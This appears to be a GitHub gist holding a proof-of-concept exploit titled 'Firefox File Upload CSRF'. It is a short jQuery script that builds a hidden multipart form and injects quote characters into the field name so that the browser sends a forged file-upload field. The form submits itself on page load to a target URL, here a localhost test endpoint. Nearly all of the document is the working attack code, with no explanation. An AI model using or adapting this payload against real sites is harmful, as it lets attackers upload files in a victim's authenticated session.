Firefox File Upload CSRF
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script> | |
<script> | |
$(document).ready(function() { | |
var request = { | |
"url": "http://localhost:4567/test", | |
"file_name": "uptest.foo", | |
"param_name": "file", | |
"file_content": "blah content" | |
} | |
if(jQuery.browser.version[0] == '2') { | |
var injection = '\\"; name=' + request['param_name'] + '; filename=' + request['file_name'] + ';'; | |
} else { | |
var injection = request['param_name'] + '"; filename="' + request['file_name']; | |
} | |
$("<form>") | |
.attr("method", "POST") | |
.attr("enctype", "multipart/form-data") | |
.attr("action", request['url']) | |
.appendTo("body"); | |
$("<input>") | |
.attr("type", "hidden") | |
.attr("name", injection) | |
.attr("value", request['file_content']) | |
.appendTo("form"); | |
$("form").submit(); | |
}); | |
</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment